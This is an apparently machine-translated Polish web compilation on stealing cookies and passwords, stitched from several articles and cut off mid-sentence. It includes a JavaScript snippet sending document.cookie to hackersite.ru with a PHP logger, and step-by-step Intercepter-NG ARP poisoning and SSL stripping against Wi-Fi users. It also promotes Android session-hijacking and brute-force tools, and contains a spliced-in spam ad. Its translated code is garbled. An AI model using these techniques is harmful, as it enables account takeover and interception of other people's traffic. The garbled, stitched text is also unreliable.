Łatwy sposób na kradzież plików cookie. Sposoby kradzieży plików cookie Pobierz program do kradzieży plików cookie
Co to jest plik cookie?
Istnieje mechanizm, który pozwala serwerowi http przechowywać niektóre informacje tekstowe, a następnie skontaktuj się z nią. Ta informacja zwane ciasteczkiem. Zasadniczo każdy plik cookie to para: nazwa parametru i jego wartość. Każdemu ciasteczkowi przypisana jest także domena, do której należy. Ze względów bezpieczeństwa we wszystkich przeglądarkach serwer http może uzyskać dostęp tylko do plików cookie swojej domeny. Dodatkowo pliki cookies mogą mieć datę ważności i w takim przypadku będą przechowywane na komputerze do tego czasu, nawet jeśli zamkniesz wszystkie okna przeglądarki.
Dlaczego pliki cookie są ważne?
Wszystkie systemy wielodostępne wykorzystują pliki cookie do identyfikacji użytkownika. Dokładniej, aktualne połączenie użytkownika z usługą, sesja użytkownika. Jeśli ktoś rozpozna Twoje pliki cookies, będzie mógł zalogować się do systemu w Twoim imieniu. Ponieważ obecnie bardzo niewiele zasobów Internetu sprawdza zmiany adresu IP podczas jednej sesji użytkownika.
Jak zmienić lub zastąpić pliki cookies?
Twórcy przeglądarek nie udostępniają wbudowanych narzędzi do edycji plików cookies. Ale możesz sobie poradzić ze zwykłym notatnikiem.
Krok 1: utwórz plik tekstowy z tekstem
Edytor rejestru systemu Windows wersja 5.00
@="C:\\IE_ext.htm"
Zapisz go pod nazwą IE_ext.reg
Krok 2: Korzystając z utworzonego pliku, dodaj zmiany do rejestru Windows.
Krok 3: utwórz plik tekstowy z tekstem
<
script
język="javascript">
external.menuArguments.clipboardData.setData("Tekst" , external.menuArguments.document.cookie);
external.menuArguments.document.cookie= „nazwa testowa=wartość testowa; ścieżka=/; domena=domena testowa.ru”;
alert(external.menuArguments.document.cookie);
script >
Zapisz go pod nazwą C:\IE_ext.htm
Krok 4: Wchodzimy na interesującą nas stronę internetową.
Krok 5: Kliknij prawym przyciskiem myszy wolna przestrzeń stronę i wybierz element menu „Praca z plikami cookie”. Zezwól na dostęp do schowka. Twoje pliki cookie z tej witryny zostaną zapisane w schowku. Możesz włożyć ich notatnik i zajrzeć.
Krok 6: Aby zmienić niektóre pliki cookie, edytuj plik C:\IE_ext.htm, zastępując go Nazwa testu w imię ciasteczka, wartość testowa- o jego znaczeniu, domena testowa.ru– do domeny serwisu. Jeśli to konieczne, dodaj więcej podobnych linii. Dla ułatwienia kontroli dodałem do skryptu dane wyjściowe bieżących plików cookie przed i po zmianie: alert(external.menuArguments.document.cookie);
Krok 7: Wykonaj ponownie krok 5, a następnie odśwież stronę.
Konkluzja: będziemy uzyskiwać dostęp do tego zasobu internetowego za pomocą zaktualizowanych plików cookie.
Jak ukraść pliki cookie za pomocą JavaScript?
Jeśli atakującemu uda się znaleźć możliwość wykonania dowolnego skryptu JavaScript na komputerze ofiary, może on z łatwością odczytać aktualne pliki cookie. Przykład:
var str= dokument.cookie;
Tylko czy uda mu się przenieść je na swoją stronę, bo tak jak wspomniałem wcześniej, skrypt JavaScript nie będzie mógł bez dodatkowego potwierdzenia uzyskać dostępu do strony znajdującej się w innej domenie? Okazuje się, że skrypt JavaScript może załadować dowolny obraz znajdujący się na dowolnym serwerze http. Jednocześnie przenieś na to zdjęcie wszelkie informacje tekstowe zawarte w żądaniu pobrania. Przykład: http://hackersite.ru/xss.jpg?text_info Jeśli więc uruchomisz ten kod:
var img= nowy wygląd();
img.src= „http://hackersite.ru/xss.jpg?”+ encodeURI(document.cookie);
wówczas plik cookie zakończy się żądaniem pobrania „zdjęcia” i „trafi” do atakującego.
Jak sobie poradzić z takimi prośbami o pobranie „obrazu”?
Osoba atakująca musi jedynie znaleźć hosting z obsługą PHP i umieścić tam taki kod:
$uid=kod url($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>
Następnie wszystkie parametry żądania dla tego skryptu zostaną zapisane w pliku log.txt. Pozostaje jedynie zastąpić opisany wcześniej skrypt JavaScript http://hackersite.ru/xss.jpg do ścieżki do tego skryptu php.
Konkluzja
Pokazałem jedynie najprostszy sposób wykorzystania luk XSS. Dowodzi to jednak, że obecność co najmniej jednej takiej luki w witrynie internetowej przeznaczonej dla wielu użytkowników może pozwolić osobie atakującej na wykorzystanie jej zasobów w Twoim imieniu.
Witam, ten krótki artykuł, a raczej krótki opis, chciałbym zadedykować sobie prosta droga przechwytywać pliki cookie sieci Wi-Fi. Nie będę Ci tu mówić, czym są pliki cookie i do czego są potrzebne, jeśli ktoś jest zainteresowany przechwytywaniem „wypieków”; w sieci bezprzewodowej, myślę, że powinien wiedzieć, co to jest i dlaczego tego potrzebuje. Powiem tylko jedno: za pomocą tych plików możesz uzyskać dostęp do kont innych osób w różnych witrynach, które wymagają od użytkowników przejścia procesu uwierzytelniania (na przykład mail.ru, vkontakte.ru itp.).
Więc zacznijmy. Najpierw musimy znaleźć samą sieć bezprzewodową z otwartą bramą dostępu do Internetu, a pożądane jest, aby sieć ta miała dość dużą liczbę klientów. Na przykład odpowiednia jest każda sieć w dużych centrach handlowych, na lotniskach, w różnych kawiarniach, w takich miejscach ludzie zwykle korzystają dostęp do Wi-Fi w Internecie, do czytania poczty, sprawdzania kont na różnych portalach randkowych, przeglądania LJ i różnych forów. To wszystko jest dokładnie tym, czego potrzebujemy. Decydując się na wybór lokalizacji sieci, po przestudiowaniu określonych godzin maksymalnej liczby klientów, przejdźmy bezpośrednio do działań bojowych. Do tego potrzebujemy laptopa z adapter Wi-Fi i pewien zestaw programów. W moim przypadku zastosowałem Laptop Acera Zainstalowany Aspire 3610, kliencka karta Wi-Fi D-Link DWL G650 i zainstalowany system operacyjny BackTrack3.
Radzę używać tego systemu operacyjnego, ponieważ zawiera on już cały zestaw programów, których możesz potrzebować, a najważniejszą zaletą jest to, że nie musisz instalować Backtrack na swoim dysk twardy, możesz uruchomić ten system operacyjny bezpośrednio z dysku CD lub dysku flash.
Przejdźmy teraz do niezbędnego oprogramowania. Użyłem kismet do wykrywania sieci, a WifiZoo do przechwytywania plików cookie. Zastanowię się szczegółowo nad drugim programem. WifiZoo to pasywny skaner transmisji, który zbiera sporo przydatnych informacji, takich jak: pop3, ruch smtp, pliki cookie/authinfo http, msn, dane uwierzytelniające FTP, ruch w sieci telnet, nbt itp. Jedyną wadą tego programu jest brak trybu przeskakiwania kanałów, WifiZoo po prostu słucha interfejs bezprzewodowy i nie może, że tak powiem, przeskakiwać z kanału na kanał. Ale tę wadę rekompensuje inny program Kismet, który obsługuje ten tryb. Aby uruchomić WifiZoo będziesz potrzebować:
- pyton
- skapujący
- przeznaczenie
Uruchommy więc program, najpierw uruchommy Kismet, aby obsługiwał tryb przeskakiwania kanałów, a następnie uruchommy bezpośrednio WifiZoo, przed tobą powinno pojawić się następujące okno:
Teraz pozostaje tylko siedzieć i czekać, aż coś przechwycisz; wszystko, co przechwyci program, znajdziesz w logach, które znajdują się w katalogu z programem /logs/. Możesz także uruchomić interfejs GUI, który automatycznie łączy się z http pod adresem 127.0.0.1:8000
Nie będę pisać o wszystkich funkcjach tego wspaniałego programu, myślę, że sam dowiesz się o pozostałych funkcjach, a ponieważ w tej chwili interesują nas tylko pliki cookie. Kliknij link z informacją o plikach cookie i zobacz, co przechwyciliśmy:
Czy zastanawiałeś się kiedyś, w jaki sposób niektóre witryny internetowe personalizują swoich gości? Można to wyrazić na przykład w zapamiętywaniu zawartości „koszyka” (jeśli węzeł ten przeznaczony jest do sprzedaży towarów) lub w sposobie wypełniania pól jakiegoś formularza. Protokół HTTP, na którym opiera się funkcjonowanie sieci WWW, nie ma możliwości śledzenia zdarzeń od jednej wizyty do kolejnej witryny, dlatego opracowano specjalny dodatek umożliwiający przechowywanie takich „stanów”. Mechanizm ten, opisany w dokumencie RFC 2109, wstawia specjalne fragmenty danych z plików cookie do żądań i odpowiedzi HTTP, co umożliwia witrynom internetowym śledzenie osób odwiedzających.
Dane cookies mogą być przechowywane przez czas trwania sesji komunikacyjnej ( na sesję), pozostając w pamięć o dostępie swobodnym podczas jednej sesji i usuwane po zamknięciu przeglądarki lub nawet po upływie określonego czasu. W pozostałych przypadkach są one trwałe ( uporczywy), pozostając na dysku twardym użytkownika jako plik tekstowy. Zazwyczaj są one przechowywane w katalogu Cookies (%windir%\Cookies w systemie Win9x i %userprofile%\Cookies w systemie NT/2000). Nie trudno się domyślić, że po przechwyceniu plików cookies w Internecie osoba atakująca może podszyć się pod użytkownika tego komputera lub zebrać treści zawarte w tych plikach. ważna informacja. Po przeczytaniu poniższych sekcji zrozumiesz, jak łatwo to zrobić.
Przechwytywanie plików cookie
Najbardziej bezpośrednią metodą jest przechwytywanie plików cookie przesyłanych przez sieć. Przechwycone dane można następnie wykorzystać podczas logowania do odpowiedniego serwera. Ten problem można rozwiązać za pomocą dowolnego narzędzia do przechwytywania pakietów, ale jednym z najlepszych jest program Lavrenty'ego Nikuli ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet zawiera dwa narzędzia, które współpracują ze sobą. Program Przechwytywanie sieci przechwytuje sam pakiet i zapisuje go na dysku, a narzędzie PeepNet otwiera plik i konwertuje go do formatu czytelnego dla człowieka. Poniższy przykład to fragment sesji komunikacyjnej odtworzonej przez PeepNet, podczas której plik cookie służy do uwierzytelniania i kontroli dostępu do przeglądanych stron (imiona zostały zmienione w celu zachowania anonimowości).
POBIERZ http://www.victim.net/images/logo.gif HTTP/1.0 Zaakceptuj: */* Strona odsyłająca: http://www.victim.net/ Host: www.victim.net Plik cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah
Powyższy przykład pokazuje fragment pliku cookie umieszczony w żądaniu HTTP przychodzącym do serwera. Najważniejsze jest pole cuid=, który określa unikalny identyfikator używany do uwierzytelniania użytkownika w węźle www.victim.net. Załóżmy, że po tym atakujący odwiedził węzeł ofiary.net, otrzymał własny identyfikator i plik cookie (przy założeniu, że węzeł nie umieszcza danych z pliku cookie w pamięci wirtualnej, ale zapisuje je na dysku twardym). Osoba atakująca może następnie otworzyć swój własny plik cookie i zastąpić nim identyfikator pola cuid= z przechwyconego pakietu. W takim wypadku logując się do serwera ofiar.net będzie on postrzegany jako użytkownik, którego dane cookies zostały przechwycone.
Możliwość programu PeepNet odtworzenie całej sesji komunikacyjnej lub jej fragmentu znacznie ułatwia realizację tego typu ataków. Za pomocą przycisku Idź weź to! Możesz ponownie pobrać strony przeglądane przez użytkownika, korzystając z jego danych cookie przechwyconych wcześniej przez CaptureNet. W oknie dialogowym narzędzia PeepNet możesz zobaczyć informacje o zrealizowanych zamówieniach. Wykorzystuje dane cookie przechwycone przez CaptureNet do uwierzytelnienia. Zwróć uwagę na ramkę znajdującą się w prawym dolnym rogu okna dialogowego danych sesji i linię znajdującą się po linii Cookie:. Są to dane cookie wykorzystywane do uwierzytelniania.
To całkiem niezła sztuczka. Ponadto użyteczność Przechwytywanie sieci może zapewnić kompletny odszyfrowany zapis ruchu, co jest prawie równoważne możliwościom profesjonalnych narzędzi, takich jak Sniffer Pro firmy Network Associates, Inc. Jednak użyteczność Sieć szpiegowska Co więcej – możesz otrzymać to za darmo!
Środki zaradcze
Powinieneś uważać na węzły, w których ciasteczka wykorzystywane do uwierzytelniania i przechowywania wrażliwych danych identyfikacyjnych. Jednym z narzędzi, które może pomóc w zapewnieniu bezpieczeństwa, jest plik Cookie Pal firmy Kookaburra Software, który można znaleźć pod adresem http://www.kburra.com/cpal.html. Ten oprogramowanie Można go skonfigurować tak, aby generował komunikaty ostrzegawcze dla użytkownika, gdy witryna internetowa będzie próbowała skorzystać z mechanizmu cookies. W takim przypadku możesz „zajrzeć za kulisy” i zdecydować, czy te działania powinny być dozwolone. W Internet Explorera Istnieje wbudowany mechanizm obsługi plików cookies. Aby ją włączyć, w Panelu sterowania uruchom aplet Opcje internetowe, przejdź do zakładki Bezpieczeństwo, wybierz element Strefa internetowa, ustaw tryb Poziom niestandardowy, a dla stałych i tymczasowych danych plików cookie ustaw przełącznik na Podpowiedź. Konfiguracja obsługi plików cookies w przeglądarce Netscape odbywa się za pomocą polecenia Edycja › Preferencje › Zaawansowane i ustawienie opcji Ostrzegaj przed akceptacją plików cookie lub Wyłącz tryb plików cookie (rys. 16.3). Akceptując plik cookie, należy sprawdzić, czy jest on zapisany na dysku i sprawdzić, czy witryna zbiera informacje o użytkownikach.
Odwiedzając witrynę korzystającą z plików cookie do uwierzytelniania, musisz upewnić się, że nazwa użytkownika i hasło, które początkowo podałeś, są szyfrowane co najmniej SSL. Wtedy informacja ta pojawi się w oknie programu PeepNet, przynajmniej nie w formie zwykłego tekstu.
Autorzy woleliby całkowicie uniknąć plików cookie, gdyby wiele często odwiedzanych witryn internetowych nie wymagało tej opcji. Na przykład w przypadku popularnej na całym świecie usługi Hotmail firmy Microsoft do rejestracji wymagane są pliki cookie. Ponieważ usługa ta wykorzystuje w procesie uwierzytelniania kilka różnych serwerów, dodanie ich do strefy Zaufanych witryn nie jest takie proste (proces ten opisano w sekcji „Rozsądne korzystanie ze stref bezpieczeństwa: typowe rozwiązanie problemu kontroli Activex”). W takim przypadku pomocne będzie oznaczenie *.hotmail.com. Pliki cookies nie są idealnym rozwiązaniem problemu niekompletności protokołu HTML, jednak alternatywne rozwiązania wydają się jeszcze gorsze (np. dodanie do adresu URL identyfikatora, który może być przechowywany na serwerach proxy). Dopóki nie pojawi się lepszy pomysł, jedyną opcją jest kontrolowanie plików cookie przy użyciu metod wymienionych powyżej.
Przechwytuj pliki cookie za pośrednictwem adresu URL
Wyobraźmy sobie coś strasznego: użytkownicy przeglądarki Internet Explorer klikają specjalnie spreparowane hiperłącza i stają się potencjalnymi ofiarami, ryzykując przechwycenie ich plików cookie. Bennett Haselton ( Bennetta Haseltona) i Jamiego McCarthy'ego ( Jamiego McCarthy’ego) z młodzieżowej organizacji Peacefire, która opowiada się za wolnością komunikacji w Internecie, opublikowała scenariusz, który wciela ten pomysł w życie. Skrypt ten pobiera pliki cookie z komputera klienckiego, gdy użytkownik kliknie łącze zawarte na tej stronie. W rezultacie zawartość pliku cookie staje się dostępna dla operatorów witryn internetowych.
Tę funkcję można wykorzystać do niegodziwych celów, osadzając znaczniki IFRAME w kodzie HTML strony internetowej, wiadomości e-mail w formacie HTML lub poście na grupie dyskusyjnej. Poniższy przykład, dostarczony przez konsultanta ds. bezpieczeństwa Richarda M. Smitha, demonstruje możliwość użycia uchwytów IFRAME za pomocą narzędzia opracowanego przez Peacefire.
Możliwe jest utworzenie podstępnej wiadomości e-mail, która „przechwytuje” pliki cookie twardy dysk użytkownika i przekazał je operatorom węzła Peacefire.org. Aby to zrobić należy wielokrotnie umieścić w nim odnośnik do tego węzła, jak pokazano w przykładzie. Pomimo tego, że goście z Peacefire wydają się całkiem miłymi ludźmi, jest mało prawdopodobne, aby ktokolwiek był szczęśliwy, gdyby dostał w swoje ręce poufne dane.
Środki zaradcze
Zainstaluj program aktualizujący, który można znaleźć pod adresem http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. Możesz także skorzystać z programu Ciasteczkowy kolego lub wbudowane funkcje przeglądarki Internet Explorer, jak opisano powyżej.
O zagrożeniach związanych z otwartymi punktami dostępu Wi-Fi, o tym, jak można przechwycić hasła.
Dzisiaj przyjrzymy się przechwytywaniu haseł przez Wi-Fi i przechwytywaniu plików cookie przez Wi-Fi za pomocą programu.
Atak nastąpi z powodu Wąchanie.
Wąchanie— powąchać, tłumaczy się jako „powąchać”. Wąchanie pozwala na analizę aktywność sieciowa w sieci, przeglądaj strony odwiedzane przez użytkownika i przechwytuj hasła. Ale można go również wykorzystać do celów pożytecznych, do podsłuchiwania wirusów wysyłających dowolne dane do Internetu.
Metoda, którą pokażę, jest dość prymitywna i prosta. W rzeczywistości możesz mocniej korzystać z programu.
Oficjalna strona programu sniff.su (skopiuj link i otwórz w nowej karcie), możesz go pobrać w sekcji "Pobierać".
Istnieje wersja dla systemu Windows Systemy uniksowe i dla Androida.
Rozważymy dla systemu Windows, ponieważ jest to najpopularniejszy system i tutaj program jest najbardziej zaawansowany.
Twoja przeglądarka lub program antywirusowy może narzekać, że program jest niebezpieczny, ale sam rozumiesz, że jest to program hackerski i zawsze zareaguje na takie hacki.
Program pobierany jest w archiwum ZIP, wystarczy rozpakować program do folderu i korzystać z niego, nie trzeba niczego instalować.
Program ma możliwość organizowania różnych ataków Mitm na sieci Wi-Fi.
Artykuł napisany jest wyłącznie w celach informacyjnych, aby na przykładzie pokazać niebezpieczeństwa związane z otwartością Punkty Wi-Fi Wszelkie określone działania wykonujesz na własne ryzyko i ryzyko. A przypominam o odpowiedzialności karnej za ochronę danych innych osób.
Praca avi1 oferuje zapierające dech w piersiach tanie ceny za możliwość zamówienia subskrybentów swojego profilu na Instagramie. Osiągnij zwiększoną popularność lub sprzedaż online już teraz, bez poświęcania dużej ilości wysiłku i czasu.
Praca z programem Intercepter NG
Tak więc program jest uruchamiany poprzez Intercepter-NG.exe.
Program ma interfejs w języku angielskim, ale jeśli jesteś pewnym użytkownikiem komputera, myślę, że sobie poradzisz.
Poniżej filmik z konfiguracją (dla tych, którzy wolą oglądać niż czytać).
- Wybierać żądaną sieć na górze, jeśli masz ich kilka.
— Zmień typ Ethernet/WiFi, jeśli masz Wi Fi, musisz wybrać ikonę Wi FI (po lewej stronie wyboru sieci)
- Naciśnij przycisk Tryb skanowania(ikona radaru)
- W pustym polu kliknij prawym przyciskiem myszy i kliknij menu kontekstowe Inteligentne skanowanie
— Pojawią się wszystkie urządzenia podłączone do sieci
— Wybierz ofiarę (możesz zaznaczyć wszystkich, przytrzymując klawisz Shift), po prostu nie zaznaczaj samego routera, jego adres IP to zwykle 192.168.1.1
- Po wybraniu kliknij prawym przyciskiem myszy i kliknij Dodaj do nat
- Przejdź do zakładki Nat
- W Ukryte IP Wskazane jest, aby zmienić ostatnią cyfrę na dowolną niezajętą, spowoduje to ukrycie Twojego prawdziwego adresu IP.
- Zaznacz Pasek SSL I SSL Mit.
- Kliknij Ustawienia(biegi po prawej).
- Zaznacz Wskrzeszenie(Umożliwi to przechwytywanie haseł i plików cookie zaszyfrowanego protokołu Https) i Usuń Fałszywe IP/Mac. Możesz zaznaczyć pole Zabójca Ciasteczek, dzięki niemu ofiara zostanie wyrzucona z bieżącej strony, np. sieci społecznościowej, a ofiara będzie musiała ponownie wpisać hasło, a my je przechwycimy. Porównaj ustawienia ze zdjęciem.
— Tutaj konfiguracja jest zakończona, zamknij ustawienia znacznikiem wyboru.
— Przygotowanie zostało zakończone, możesz rozpocząć atak.
— Naciśnij przycisk u góry Rozpocznij/zatrzymaj wąchanie(trójkąt), w tym samym oknie kliknij ikonę promieniowania na dole Uruchom/zatrzymaj truciznę ARP
— Przejdź do zakładki Tryb hasła i kliknij prawym przyciskiem myszy w oknie i wybierz Pokaż pliki cookie(„Umożliwi to wyświetlenie plików cookie i haseł wprowadzonych przez ofiary”)
To wszystko, czekamy, aż ktoś wpisze hasło.
Czasami zdarza się, że Internet przestaje działać, spróbuj samodzielnie uzyskać dostęp do Internetu, jeśli to nie zadziała, uruchom ponownie program.
Zauważyłem, że nie zawsze udaje się przechwycić hasło, jednak faktycznie działa to niemal bezawaryjnie.
To wszystko. Przyjrzeliśmy się przechwytywaniu haseł przez Wi-Fi i przechwytywaniu plików cookie przez Wi-Fi.
Dbaj o siebie
„Smartfon z narzędziami hakerskimi? Nie ma czegoś takiego” – powiedzielibyśmy niedawno. Niektóre ze zwykłych narzędzi do przeprowadzania ataków można było uruchomić tylko na niektórych Maemo. Obecnie wiele znanych narzędzi zostało przeniesionych na iOS i Androida, a niektóre narzędzia hakerskie zostały napisane specjalnie dla środowiska mobilnego. Czy smartfon może zastąpić laptop w testach penetracyjnych? Postanowiliśmy to sprawdzić.
ANDROID
Android to popularna platforma nie tylko dla zwykłych śmiertelników, ale także dla właściwych osób. Liczba przydatnych narzędzi ][ jest tutaj po prostu nieprawdopodobna. Za to możemy podziękować UNIXowym korzeniom systemu - znacznie uprościło to przenoszenie wielu narzędzi na Androida. Niestety Google nie pozwala na wprowadzenie niektórych z nich do Sklepu Play, dlatego będziesz musiał ręcznie zainstalować odpowiedni plik APK. Ponadto niektóre narzędzia wymagają maksymalnego dostępu do systemu (na przykład zapora sieciowa iptables), dlatego należy wcześniej zadbać o dostęp do konta root. Każdy producent stosuje tutaj własną technologię, ale znalezienie niezbędnych instrukcji jest dość łatwe. Dobry zestaw HOWTO został zebrany przez zasób LifeHacker (bit.ly/eWgDlu). Jeśli jednak nie udało Ci się znaleźć tutaj żadnego modelu, z pomocą zawsze przychodzi forum XDA-Developers (www.xda-developers.com), na którym możesz znaleźć różne informacje praktycznie dla każdego modelu telefonu z Androidem. Tak czy inaczej, niektóre z narzędzi opisanych poniżej będą działać bez dostępu do roota.Menedżer pakietów
BotBrew Zacznijmy recenzję od nietypowego menedżera pakietów. Twórcy nazywają to „narzędziami dla superużytkowników” i nie jest to dalekie od prawdy. Po zainstalowaniu BotBrew otrzymasz repozytorium, z którego możesz pobrać ogromną liczbę znanych narzędzi skompilowanych dla Androida. Wśród nich: interpretery Pythona i Ruby do uruchamiania wielu zapisanych w nich narzędzi, sniffer tcpdump i skaner Nmap do analizy sieci, Git i Subversion do pracy z systemami kontroli wersji i wiele więcej.Skanery sieciowe
PIPS Niepozorny smartfon, który w przeciwieństwie do laptopa łatwo mieści się w kieszeni i nigdy nie budzi podejrzeń, może przydać się do eksploracji sieci. Powiedzieliśmy już powyżej, jak zainstalować Nmap, ale istnieje inna opcja. PIPS to port skanera Nmap specjalnie dostosowany do systemu Android, aczkolwiek nieoficjalny. Oznacza to, że możesz szybko znaleźć aktywne urządzenia w sieci, określić ich system operacyjny za pomocą opcji odcisków palców, wykonać skanowanie portów - krótko mówiąc, zrobić wszystko, do czego potrafi Nmap. Fing Pomimo całej jego mocy, korzystanie z Nmapa wiąże się z dwoma problemami. Po pierwsze, parametry skanowania przekazywane są za pomocą klawiszy uruchamiania, które trzeba nie tylko znać, ale także umieć wprowadzić za pomocą niewygodnej klawiatury mobilnej. Po drugie, wyniki skanowania w wynikach konsoli nie są tak jasne, jak byśmy chcieli. Skaner Fing nie ma tych wad, bardzo szybko skanuje sieć, pobiera odciski palców, a następnie wyświetla w przejrzystej formie listę wszystkich dostępnych urządzeń, dzieląc je według typu (router, komputer stacjonarny, iPhone itd.). Jednocześnie dla każdego hosta możesz szybko wyświetlić listę otwartych portów. Co więcej, stąd możesz połączyć się, powiedzmy, z FTP, korzystając z klienta FTP zainstalowanego w systemie - bardzo wygodne. Audyt sieci Jeśli chodzi o analizę konkretnego hosta, narzędzie NetAudit może okazać się niezastąpione. Działa na każdym urządzeniu z Androidem (nawet nierootowanym) i pozwala nie tylko szybko zidentyfikować urządzenia w sieci, ale także sprawdzić je za pomocą dużej bazy danych odcisków palców w celu identyfikacji system operacyjny, a także systemy CMS stosowane na serwerze WWW. Obecnie w bazie danych znajduje się ponad 3000 cyfrowych odcisków palców. Narzędzia sieciowe Jeśli wręcz przeciwnie, musisz pracować na niższym poziomie i dokładnie sprawdzić działanie sieci, nie możesz obejść się bez Net Tools. Jest niezastąpiony w pracy Administrator systemu zestaw narzędzi pozwalający na pełną diagnozę działania sieci, do której podłączone jest urządzenie. Pakiet zawiera ponad 15 różnych typów programów, takich jak ping, traciroute, arp, dns, netstat, Route.Manipulacja ruchem
Rekin dla roota Sniffer oparty na tcpdump rzetelnie loguje wszystkie dane do pliku pcap, który można następnie zbadać za pomocą znanych narzędzi, takich jak Wireshark lub Network Miner. Ponieważ nie zaimplementowano w nim żadnych możliwości ataków MITM, jest to raczej narzędzie do analizy ruchu. Jest to na przykład świetny sposób na sprawdzenie, jakie programy zainstalowane na Twoim urządzeniu z podejrzanych repozytoriów transmitują. FaceNiff Jeśli mówimy o aplikacjach bojowych na Androida, to jedną z najbardziej rewelacyjnych jest FaceNiff, który implementuje przechwytywanie i wstrzykiwanie do przechwytywanych sesji internetowych. Pobierając pakiet APK z programem, możesz uruchomić to narzędzie hakerskie na prawie każdym smartfonie z Androidem i łącząc się z siecią bezprzewodową, przechwytywać konta różnych usług: Facebook, Twitter, VKontakte i tak dalej - ponad dziesięć razem. Przejmowanie sesji odbywa się za pomocą ataku ARP spoofing, jednak atak jest możliwy tylko na połączeniach niezabezpieczonych (FaceNiff nie jest w stanie wcisnąć się w ruch SSL). Aby ograniczyć przepływ skryptów, autor ograniczył maksymalną liczbę sesji do trzech - wówczas należy skontaktować się z programistą w celu uzyskania specjalnego kodu aktywacyjnego. DroidOwca Jeśli twórca FaceNiff chce pieniędzy za jego używanie, to DroidSheep jest całkowicie darmowym narzędziem o tej samej funkcjonalności. Co prawda pakietu dystrybucyjnego nie znajdziesz na oficjalnej stronie internetowej (wynika to z surowych niemieckich przepisów dotyczących narzędzi bezpieczeństwa), ale bez problemu można go znaleźć w Internecie. Głównym zadaniem narzędzia jest przechwytywanie sesji internetowych użytkowników popularnych portale społecznościowe, zaimplementowane przy użyciu tego samego ARP Spoofing. Istnieje jednak problem z bezpiecznymi połączeniami: podobnie jak FaceNiff, DroidSheep kategorycznie odmawia współpracy z protokołem HTTPS. Spoofer sieciowy To narzędzie pokazuje również niepewność open sieci bezprzewodowe, ale na nieco innej płaszczyźnie. Nie przechwytuje sesji użytkowników, ale umożliwia przepływ ruchu HTTP przez siebie, stosując atak spoofingowy, wykonując przy jego pomocy określone manipulacje. Zaczynając od zwykłych żartów (zastąpienie wszystkich zdjęć na stronie trollami, przerzucenie wszystkich obrazów lub, powiedzmy, zastąpienie Wyniki Google), a kończąc na atakach phishingowych, gdy użytkownikowi udostępniane są fałszywe strony takich popularnych serwisów jak facebook.com,linkedin.com, vkontakte.ru i wiele innych. Anti (zestaw narzędzi dla sieci Android firmy zImperium LTD)Jeśli zapytasz, które narzędzie hakerskie dla Androida jest najpotężniejsze, Anti prawdopodobnie nie ma konkurencji. To prawdziwy kombajn hakerski. Głównym zadaniem programu jest skanowanie obwodu sieci. Następnie do walki wkraczają różne moduły, za pomocą których wdrażany jest cały arsenał: podsłuchiwanie ruchu, przeprowadzanie ataków MITM i wykorzystywanie znalezionych luk. To prawda, że są też wady. Pierwszą rzeczą, która rzuca się w oczy, jest to, że wykorzystanie luk odbywa się wyłącznie z centralnego serwera programu, który znajduje się w Internecie, w wyniku czego cele nie posiadające zewnętrznego adresu IP mogą zostać zapomniane.
Tunelowanie ruchu
Totalny Dowódca Dobrze znane menedżer plików teraz na smartfonach! Podobnie jak w wersji na komputery stacjonarne, istnieje system wtyczek umożliwiających łączenie się z różnymi katalogami sieciowymi, a także kanoniczny tryb dwóch paneli - szczególnie wygodny na tabletach. Tunel SSH No dobrze, ale jak zapewnić bezpieczeństwo danych przesyłanych w otwartej sieci bezprzewodowej? Oprócz VPN, który Android obsługuje od razu po wyjęciu z pudełka, możesz utworzyć tunel SSH. Do tego celu służy wspaniałe narzędzie SSH Tunnel, które pozwala na przekierowanie ruchu wybranych aplikacji lub całego systemu jako całości przez zdalny serwer SSH. ProxyDroid Często konieczne jest przesyłanie ruchu przez proxy lub SOX i w tym przypadku ProxyDroid będzie pomocny. To proste: wybierasz ruch aplikacji, który chcesz tunelować i określasz serwer proxy (obsługiwane są protokoły HTTP/HTTPS/SOCKS4/SOCKS5). Jeśli wymagana jest autoryzacja, ProxyDroid również ją obsługuje. Nawiasem mówiąc, konfigurację można powiązać z konkretną siecią bezprzewodową różne ustawienia dla każdego z nich.Sieć bezprzewodowa
Analizator Wi-Fi Wbudowany menedżer sieci bezprzewodowej nie dostarcza zbyt wielu informacji. Jeśli chcesz szybko uzyskać pełny obraz pobliskich punktów dostępu, narzędzie Wifi Analyzer będzie doskonałym wyborem. Nie tylko pokaże wszystkie pobliskie punkty dostępowe, ale także wyświetli kanał, na którym działają, ich adres MAC i, co najważniejsze, rodzaj zastosowanego szyfrowania (po zobaczeniu upragnionych liter „WEP” możemy założyć, że dostęp do zapewniona jest bezpieczna sieć). Ponadto narzędzie jest idealne, jeśli chcesz znaleźć fizyczną lokalizację żądanego punktu dostępu, dzięki wizualnemu wskaźnikowi siły sygnału. WiFiKill Narzędzie to, jak twierdzi jego twórca, może przydać się, gdy sieć bezprzewodowa jest zapełniona klientami korzystającymi z całego kanału i właśnie w tym momencie potrzebne jest dobre i stabilne połączenie. WiFiKill umożliwia odłączanie klientów od Internetu w sposób selektywny lub w oparciu o określone kryterium (np. możliwe jest wyśmiewanie wszystkich członków Yabłoko). Program po prostu przeprowadza atak polegający na fałszowaniu protokołu ARP i przekierowuje wszystkich klientów do siebie. Algorytm ten jest głupio po prostu zaimplementowany w oparciu o iptables. To jest panel sterowania dla sieci bezprzewodowych typu fast food :).Audyt aplikacji internetowych
Konstruktor zapytań HTTP Manipulowanie żądaniami HTTP z komputera to bułka z masłem; istnieje do tego ogromna liczba narzędzi i wtyczek do przeglądarek. W przypadku smartfona wszystko jest nieco bardziej skomplikowane. Kreator zapytań HTTP pomoże Ci wysłać niestandardowe żądanie HTTP z potrzebnymi parametrami, na przykład żądanym plikiem cookie lub zmienionym klientem użytkownika. Wynik żądania zostanie wyświetlony w standardowej przeglądarce. Router Brute Force ADS 2 Jeśli witryna hasło chronione korzystając z podstawowego uwierzytelniania dostępu, możesz sprawdzić jego niezawodność za pomocą narzędzia Router Brute Force ADS 2. Początkowo narzędzie zostało stworzone do brutalnego wymuszania haseł na panelu administracyjnym routera, ale jasne jest, że można go użyć do dowolnego innego zasobu o podobnych ochrona. Narzędzie działa, ale jest wyraźnie prymitywne. Na przykład programista nie przewiduje brutalnej siły, a jedynie brutalną siłę przy użyciu słownika. AndDOSid Na pewno słyszałeś o tak rewelacyjnym programie do wyłączania serwerów WWW jak Slowloris. Zasada jego działania polega na 